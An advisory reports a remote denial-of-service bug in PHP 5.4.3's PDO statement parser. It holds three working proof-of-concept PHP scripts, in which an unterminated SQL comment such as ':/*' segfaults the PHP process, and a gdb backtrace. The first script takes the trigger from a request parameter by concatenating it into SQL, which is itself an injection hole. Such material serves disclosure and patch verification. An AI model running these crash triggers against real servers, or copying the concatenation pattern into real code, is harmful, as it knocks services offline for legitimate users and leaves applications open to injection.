source: https://www.securityfocus.com/bid/54777/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.

PHP 5.4.3 is vulnerable; other versions may also be affected.

<?php
// Proof of concept 1/3: the crash reached through "escaped" request input.
//
// What the three scripts on this page show: running a prepared statement
// whose SQL text ends in an unterminated block comment ("/*" with no "*/";
// scripts 2 and 3 also put a bare named-placeholder marker ":" in front of
// it) makes PDO's statement parser segfault. The gdb backtrace at the bottom
// puts the fault inside pdo_parse_params(), i.e. in C code in the PDO
// extension, so the whole PHP process dies rather than a single request
// failing — that is the denial of service. The try/catch below cannot help:
// a SIGSEGV is not a PHP exception, so "Failed:" is never printed.
//
// Review notes:
//  - mysql_real_escape_string() is not a mitigation. It escapes only NUL,
//    \n, \r, backslash, single quote, double quote and \x1a; ":" and "/*"
//    pass through untouched, so input that has been "escaped" still reaches
//    the parser bug. The only real defence for an application is to never
//    concatenate request data into the SQL text at all (bind it as a
//    parameter instead) — the concatenation below is itself SQL injection,
//    which is the precondition a remote attacker needs.
//  - mysql_real_escape_string() belongs to ext/mysql and needs an ext/mysql
//    link; the PDO handle above is not one. Whether it opens an implicit
//    default link or returns false (with a warning, concatenating as "") is
//    environment dependent — TODO confirm on the target build. Scripts 2
//    and 3 sidestep this by hard-coding the trigger string.
//  - Target environment is a throwaway local MySQL (db "aws", user root,
//    empty password) and the PHP 5.4.3 build named above. NOTE(review):
//    this looks like the PDO SQL-parser unterminated-comment bug tracked as
//    CVE-2012-3450 (fixed in PHP 5.3.14 / 5.4.4) — verify against the PHP
//    changelog before citing.
try {
$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
//tokens:
// SELECT;*;from;'user';/*
//$sql = "SELECT * from 'user'/*";
// The token comment above documents the SQL text the author was aiming
// for: the trailing "/*" is supplied through the "query" request parameter.
$stmt = $db->prepare("SELECT * from 'user'".mysql_real_escape_string($_GET['query']));
$stmt->execute(); //crash
// Not reached when the trigger fires; left in so the script also "works" as
// a normal query when the parameter is benign.
$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
$stmt->fetch(PDO::FETCH_BOUND);
print_r( $type);
} catch (Exception $e) {
echo "Failed: " . $e->getMessage();
}
?>

-----

<?php
// Proof of concept 2/3: minimal trigger, no request input involved.
// The whole SQL text is a placeholder marker followed by an unterminated
// comment; per the author's comment on execute() that alone is enough to
// reach the faulting parser path. Do not expect the catch block to fire —
// the process is killed by the signal.
try {
$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
//tokens:
// SELECT;*;from;'user';/*
$sql = ":/*";
$stmt = $db->prepare($sql);
$stmt->execute(); // crashes php worker in pdo_parse_params()
$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
$stmt->fetch(PDO::FETCH_BOUND);
print_r( $type);
} catch (Exception $e) {
echo "Failed: " . $e->getMessage();
}
?>

---

<pre>
<?php
// Proof of concept 3/3: the same trigger embedded in an otherwise ordinary
// SELECT, instrumented with progress echoes so the last line printed shows
// how far execution got before the process died. The author's comment
// places the crash at execute(), so "prepared :)" (and the print_r of the
// statement object) should be the last output; "executed :(" and
// "hmmm end" should never appear.
echo "hmm beginning\n";
try {
$db = new PDO('mysql:host=localhost;dbname=aws', "root", "");
echo "lets get it on\n";
//tokens:
// SELECT;*;from;'user';/*
// "/**" opens a block comment that is never closed (no "*/").
$sql = "SELECT * from user :/**";
echo $sql;
$stmt = $db->prepare($sql);
echo "prepared :)\n";
print_r($stmt);
$stmt->execute(); // crashes php worker in pdo_parse_params()
print_r($stmt);
echo "executed :(\n";
$stmt->bindColumn(2, $type, PDO::PARAM_STR, 256);
$stmt->fetch(PDO::FETCH_BOUND);
echo "--data-\n";
print_r( $type);
echo "--data--\n";
} catch (Exception $e) {
echo "EXCEPTION";
echo "Failed: " . $e->getMessage();
}
echo "hmmm end\n";
?>
</pre>

Actual result:
--------------
root@bt:/opt/lampp# gdb ./bin/php
(gdb) run poc_pdo_linux_short_1.php
Starting program: /opt/lampp/bin/php /opt/lampp/poc_pdo_linux_short_1.php
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x08228a81 in ?? ()
(gdb) bt
#0  0x08228a81 in ?? ()
#1  0x082280eb in pdo_parse_params ()
#2  0x08223891 in ?? ()
#3  0x084b2aad in ?? ()
#4  0x084b1f87 in execute ()
#5  0x08490ed2 in zend_execute_scripts ()
#6  0x0843f13c in php_execute_script ()
#7  0x08506b46 in main ()